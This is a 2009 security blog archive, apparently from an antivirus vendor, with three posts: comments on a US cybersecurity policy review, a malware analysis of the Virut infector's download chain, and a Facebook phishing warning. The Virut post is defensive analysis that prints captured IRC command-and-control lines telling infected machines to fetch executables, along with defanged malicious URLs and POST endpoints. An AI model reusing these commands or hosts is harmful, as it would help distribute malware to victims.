Archive for May, 2009

Cyberspace Policy Review

Friday, May 29th, 2009

If you’re looking for the 60-page cybersecurity policy review that President Barack Obama discussed this morning, you can find it here.

Considering that AlephOne’s article on “Smashing the Stack for Fun and Profit” was released in 1996, Iloveyou in 2000, CodeRed in 2001, the Slammer worm in 2003, the Witty worm event in 2004, the thousands of system intrusions and compromises since (reported and unreported), and the list goes on, the review seems around fifteen years late on delivery. But better late than never. It addresses badly needed subjects and planning in thoughtful and creative ways.

Some of the document is predictably clumsy. Chapter IV, “Creating Effective Information Sharing and Incident Response”, oddly starts out with a current example of Downadup/Conficker as impetus for action: “For example, despite advance warning and instructions on how networks could be protected, had the “Conficker [Downadup]”worm activated on April 1, 2009 with a malicious payload, some federal departments and agencies were not prepared to respond”. What malicious payload? Unprepared in what way? To infected machines within the federal and state governements? To a DDoS attack from the the majority of Downadup-infected systems across the ocean that actually were infected (and most just wound up with a FakeAv download)? Don’t leave me hanging, folks, what were they unprepared for?

Of note, some of the law enforcement agencies in attendance at the presentation have field offices with agents that don’t know what a URL is (which is much like reporting something to a police officer and hearing them respond “Sorry, I don’t know what a street address is, please tell someone else”). Based on that level of techno-savvy, the section on cyber-education is much needed, overdue, and significant: “Building Capacity for a Digital Nation”.

It’s a good read, especially the section addressing internationally co-ordinated efforts, “Partner Effectively With the International Community”.

Cheers to open dialog about cyber-security challenges!

Virut Distributing Koobface, Ad-Clickers and Spambots

Tuesday, May 26th, 2009

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users’ systems even when the traditional Av scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.


The first server that the current active Virut variant attempts to connect with is, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Pragma: no-cache
(Incidentally, is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds. Facebook Phish

Thursday, May 21st, 2009

While no product protects against absolutely everything, a couple of technical support people here had links sent from their friends to their Facebook account, telling them to check out “Brunga. at”. (Do not visit this site right now to fill out login information, it will steal your credentials.)

Subject: Dan Shmoo sent you a message on Facebook…
Dan sent you a message.

Subject: Hello

Screenshot of the site here, notice the blue banner missing the logo:

After filling out authentication details that are then stolen, the user is then redirected to the real Facebook site.
Use your head and always be aware of the site’s url when entering authentication/login info. Careful of phishing attacks.

Sorry, folks, ThreatFire doesn’t protect you from phishing attempts like this one — it wasn’t designed to stop phish, and nothing at the software behavioral level looks malicious here. The times that we visited the active site, there was no malware delivered from brunga. However, there was an iframe at the bottom of the page redirecting the browser to a site that has been known to deliver LuckySploit exploit pages (updateserver. com, another site to avoid for now). Any successful LuckySploit attack is bound to deliver a barrage of various malware, recently including banking password-stealer Zbot, sophisticated spambots like Rustock, and various other custom-made keyloggers. This specific server is busy, malicious, and it has been involved in poisoning too. On a daily basis, ThreatFire is preventing these malformed-pdf based LuckySploit attacks in high numbers.